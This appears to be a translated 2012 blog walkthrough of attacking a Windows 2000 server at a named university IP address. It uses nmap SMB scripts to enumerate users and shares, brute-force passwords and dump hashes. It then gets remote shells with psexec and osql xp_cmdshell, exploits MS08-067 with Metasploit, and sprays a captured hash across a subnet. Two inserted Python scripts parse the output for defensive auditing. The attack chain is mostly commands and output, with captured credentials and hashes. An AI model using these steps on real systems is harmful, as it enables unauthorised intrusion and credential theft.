Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241

// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241

// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241

// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
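From the defender's side, the pwdump output above is a password audit waiting to be read. The following Python script is an added example, not part of the original post and not part of nmap or pwdump: it parses pwdump-style `user:rid => LMhash:NThash` lines (including nmap's `|` prefixes) and flags accounts with a blank password, accounts that still have an LM hash stored (the machine has not set the NoLMHash policy), and LM hashes whose second half is the well-known empty block, which proves the password is at most 7 characters long. The sample input is taken from the scan output above; the constants for the empty LM and NT hashes are the standard values.

```python
import re

# Sample input, copied from the smb-pwdump output above (pwdump6 format:
# user:rid => LMhash:NThash, with "NO PASSWORD****" standing in for an empty hash).
SAMPLE_PWDUMP = """\
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

# LM splits the password into two 7-byte halves and hashes each separately.
# The hash of an empty half is this constant, so an LM hash ending in it means
# the password fits entirely in the first half: 7 characters or fewer.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM = EMPTY_LM_HALF * 2                      # LM hash of the empty password
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"      # NT hash of the empty password

LINE_RE = re.compile(
    r"^\|?_?\s*(?P<user>[^:]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+)$"
)


def _normalise(field):
    """Return the hash in upper case, or None when pwdump printed its empty marker."""
    field = field.strip().upper()
    return None if field.startswith("NO PASSWORD") else field


def audit_pwdump(text):
    """Map each account name to the list of weaknesses found in its hashes.

    pwdump does not report whether an account is disabled, so a flagged Guest
    account still has to be checked against the account status on the host.
    """
    findings = {}
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue                                  # not a hash line
        user = m["user"].strip()
        lm, nt = _normalise(m["lm"]), _normalise(m["nt"])
        issues = []
        if nt is None or nt == EMPTY_NT:
            issues.append("blank password")
        if lm is not None and lm != EMPTY_LM:
            # An LM hash is stored at all only when NoLMHash is not enforced;
            # LM is case-insensitive and split in two, so it cracks in minutes.
            issues.append("LM hash stored")
            if lm.endswith(EMPTY_LM_HALF):
                issues.append("password is 7 characters or fewer")
        findings[user] = issues
    return findings


def weak_accounts(text):
    """Sorted names of the accounts that have at least one finding."""
    return sorted(user for user, issues in audit_pwdump(text).items() if issues)


if __name__ == "__main__":
    for user, issues in audit_pwdump(SAMPLE_PWDUMP).items():
        print("%-16s %s" % (user, "; ".join(issues) or "ok"))
```

Run against the sample, the script reports Administrator and Guest as blank, test as having an LM hash for a password of at most 7 characters (consistent with the `123456` guessed earlier), and TsInternetUser as LM-hashed with a longer password. The remediation follows directly: set passwords on the blank accounts, enable NoLMHash and force a password change so the LM hashes are removed.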
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and execute a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
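The three script outputs above (smb-enum-shares, smb-brute, smb-check-vulns) are exactly what an internal vulnerability scan should turn into tickets: a share readable anonymously, accounts whose password a default wordlist guesses, and a missing patch. The Python triage script below is an added example, not part of the original post and not nmap's own code. It reads nmap's normal output, tracks which host and which script each `|` line belongs to, and emits one finding per problem. The sample input is constructed from the three scan outputs above; the `MS06-025: NOT VULNERABLE` line is made up to show that a negative result is not reported as a finding (a naive `"VULNERABLE" in line` check would flag it).

```python
import re

# Constructed sample: the host script blocks from the three scans above merged
# into one nmap-style report. The "NOT VULNERABLE" line is invented for the test.
SAMPLE_NMAP = """\
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|   MS06-025: NOT VULNERABLE
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:.*\()?(\d+\.\d+\.\d+\.\d+)\)?")
# A script header is a "|"-prefixed line holding only the script name and a colon.
SCRIPT_RE = re.compile(r"^\|_?\s*([a-z0-9-]+):\s*$")


def parse_host_scripts(text):
    """Yield (host, script, line) for every output line of every host script."""
    host, script = None, None
    for raw in text.splitlines():
        m = HOST_RE.match(raw)
        if m:
            host, script = m.group(1), None
            continue
        if not raw.startswith("|"):
            script = None                      # left the script output block
            continue
        m = SCRIPT_RE.match(raw)
        if m:
            script = m.group(1)
            continue
        if host and script:
            yield host, script, raw.lstrip("|_ ").strip()


VULNERABLE_STATES = ("VULNERABLE", "LIKELY VULNERABLE")


def triage(text):
    """Turn script output into (host, finding) pairs a defender should act on."""
    findings = []
    share = None
    for host, script, line in parse_host_scripts(text):
        if script == "smb-enum-shares":
            if line.startswith("Anonymous access:"):
                level = line.split(":", 1)[1].strip()
                if level != "<none>":
                    findings.append((host, "anonymous %s access to share %s" % (level, share)))
            else:
                share = line                   # a share name precedes its access line
        elif script == "smb-brute" and "Login was successful" in line:
            user, secret = line.split("=>", 1)[0].strip().split(":", 1)
            what = "blank password" if secret == "<blank>" else "weak (wordlist) password"
            findings.append((host, "account %s has a %s" % (user, what)))
        elif script == "smb-check-vulns" and ":" in line:
            check, status = (part.strip() for part in line.split(":", 1))
            # Exact match: "NOT VULNERABLE" must not be reported.
            if status.upper() in VULNERABLE_STATES:
                findings.append((host, "missing patch %s" % check))
    return findings


if __name__ == "__main__":
    for host, finding in triage(SAMPLE_NMAP):
        print("%s  %s" % (host, finding))
```

Each finding maps to a control: restrict anonymous access to IPC$ (RestrictAnonymous), enforce a password policy and rotate the guessed credentials, and apply the MS08-067 update. The parser keys on `Nmap scan report for` lines, so the same script works over a multi-host report such as the subnet sweep later in the post.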
root@bt:~# msfconsole   // use the MS08-067 vulnerability in msf to exploit the target machine

msf > search ms08-
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt

test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt

44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254

// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
Attack successful. A simple msf+nmap attack~~